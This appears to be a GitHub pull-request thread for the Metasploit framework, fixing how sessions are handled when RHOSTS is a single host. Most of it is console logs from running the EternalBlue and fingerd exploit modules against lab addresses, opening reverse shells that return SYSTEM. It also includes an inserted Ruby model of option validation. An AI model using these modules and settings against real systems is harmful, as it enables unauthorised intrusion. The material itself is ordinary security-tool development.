
Fix issue of not interacting with session when exploiting with single-host rhosts. #10751

Merged
merged 1 commit into from Oct 5, 2018


Green-m commented Oct 5, 2018

Fix #10748

Single-host

Interact with session once created.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.6.88
rhosts => 192.168.6.88
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.88:445 - Connecting to target for exploitation.
[+] 192.168.6.88:445 - Connection established for exploitation.
[+] 192.168.6.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.6.88:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.6.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.6.88:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.6.88:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.6.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.6.88:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.6.88:445 - Sending all but last fragment of exploit packet
[*] 192.168.6.88:445 - Starting non-paged pool grooming
[+] 192.168.6.88:445 - Sending SMBv2 buffers
[+] 192.168.6.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.6.88:445 - Sending final SMBv2 buffers.
[*] 192.168.6.88:445 - Sending last fragment of exploit packet!
[*] 192.168.6.88:445 - Receiving response from exploit packet
[+] 192.168.6.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.6.88:445 - Sending egg to corrupted connection.
[*] 192.168.6.88:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.6.164:4444 -> 192.168.6.88:49161) at 2018-10-05 17:28:27 +0800
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
nt authority\system

Multiple hosts

Put session in background.

msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOSTS              192.168.6.88/30  yes       The target address range or CIDR identifier
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.6.164    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Exploiting target 192.168.6.88

[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.88:445 - Connecting to target for exploitation.
[+] 192.168.6.88:445 - Connection established for exploitation.
[+] 192.168.6.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.6.88:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.6.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.6.88:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.6.88:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.6.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.6.88:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.6.88:445 - Sending all but last fragment of exploit packet
[*] 192.168.6.88:445 - Starting non-paged pool grooming
[+] 192.168.6.88:445 - Sending SMBv2 buffers
[+] 192.168.6.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.6.88:445 - Sending final SMBv2 buffers.
[*] 192.168.6.88:445 - Sending last fragment of exploit packet!
[*] 192.168.6.88:445 - Receiving response from exploit packet
[+] 192.168.6.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.6.88:445 - Sending egg to corrupted connection.
[*] 192.168.6.88:445 - Triggering free of corrupted buffer.
[*] Command shell session 3 opened (192.168.6.164:4444 -> 192.168.6.88:49160) at 2018-10-05 17:27:16 +0800
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
[*] Exploiting target 192.168.6.89
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.89:445 - Connecting to target for exploitation.
[-] 192.168.6.89:445 - Rex::ConnectionTimeout: The connection timed out (192.168.6.89:445).
[*] Exploiting target 192.168.6.90
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.90:445 - Connecting to target for exploitation.
[-] 192.168.6.90:445 - Rex::ConnectionTimeout: The connection timed out (192.168.6.90:445).
[*] Exploiting target 192.168.6.91
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.91:445 - Connecting to target for exploitation.
^C[-] 192.168.6.91:445 - Exploit failed [user-interrupt]: Interrupt
[*] Stopping exploiting current target 192.168.6.91...
[*] Control-C again to force quit exploiting all targets.
^C[-] exploit: Interrupted

Contributor

wvu-r7 commented Oct 5, 2018

msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Exploiting target 127.0.0.0

[-] 127.0.0.0:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.1
[-] 127.0.0.1:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.2
[-] 127.0.0.2:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.3
[-] 127.0.0.3:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.4
[-] 127.0.0.4:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.5
[-] 127.0.0.5:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.6
[-] 127.0.0.6:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.7
[-] 127.0.0.7:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.8
[-] 127.0.0.8:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.9
[-] 127.0.0.9:445 - Exploit failed: The following options failed to validate: LHOST.

This is problematic. It's an infinite RHOSTS-length loop when a required option is unconfigured.

Contributor

Green-m commented Oct 5, 2018

@wvu-r7
That's actually a lot of noisy output, and to solve this we have to refactor the validate method during exploit; currently this validate method is implemented in exploit_driver, which is called by cmd_exploit many times.
Maybe there is a better idea? I am glad to discuss the details of rhosts exploit; for now, it's still an experimental feature, which is not flawless.
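A constructed Ruby model, added here and not Metasploit's own code, of the two behaviours discussed in this thread: required options validated once before the RHOSTS loop (so an unset LHOST fails once rather than once per host), and a single-host RHOSTS interacting with its session while a range backgrounds sessions and moves on. It uses Ruby's stdlib IPAddr for range expansion and a caller-supplied block in place of the real exploit attempt; all method and class names are hypothetical.

```ruby
require 'ipaddr'

# Constructed model of a console driving one exploit over RHOSTS.
# Not Metasploit code: names and structure are hypothetical.
class MissingOptionError < StandardError; end

# Expand RHOSTS (a single host or a CIDR range) into an ordered host list.
# "192.168.6.88/30" yields .88, .89, .90, .91, as in the thread's output.
def expand_rhosts(rhosts)
  IPAddr.new(rhosts).to_range.map(&:to_s)
end

# Validate required options exactly once, before the per-host loop, so an
# unset LHOST fails fast instead of failing once for every host in the range.
def validate_options!(opts, required)
  missing = required.select { |k| opts[k].nil? || opts[k].to_s.empty? }
  return if missing.empty?
  raise MissingOptionError,
        "The following options failed to validate: #{missing.join(', ')}."
end

# Run the exploit over every host. `attempt` is a caller-supplied block that
# stands in for the real exploit and returns a session id or nil.
# Returns the console messages so the behaviour can be checked.
def run_exploit(opts, required: %w[RHOSTS LHOST], &attempt)
  validate_options!(opts, required)
  hosts = expand_rhosts(opts['RHOSTS'])
  log = []
  hosts.each do |host|
    log << "Exploiting target #{host}"
    sid = attempt.call(host)
    if sid.nil?
      log << "#{host}:445 - Exploit failed"
    elsif hosts.size == 1
      # Single host: drop straight into the session (the fix in this PR).
      log << "Session #{sid} opened, interacting"
    else
      # Range: background the session and continue with the next host.
      log << "Session #{sid} created in the background"
    end
  end
  log
end
```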

Contributor

wvu-r7 commented Oct 5, 2018

Since this is an extant problem (it's in master), and this PR addresses a separate issue, I will land this.

@wvu-r7 wvu-r7 merged commit 3ec71ed into rapid7:master Oct 5, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Oct 5, 2018

Contributor

wvu-r7 commented Oct 5, 2018

Release Notes

This fixes an issue where setting a single host for RHOSTS in an exploit causes sessions to be created in the background with no interaction.

Contributor

wvu-r7 commented Oct 5, 2018

Rebased #10700:

msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:7979 - Connecting to fingerd
[*] 127.0.0.1:7979 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:53202) at 2018-10-05 14:42:06 -0500

/usr/ucb/whoami
nobody

Lovely, thank you!

@Green-m Green-m deleted the Green-m:issue_10748 branch Oct 6, 2018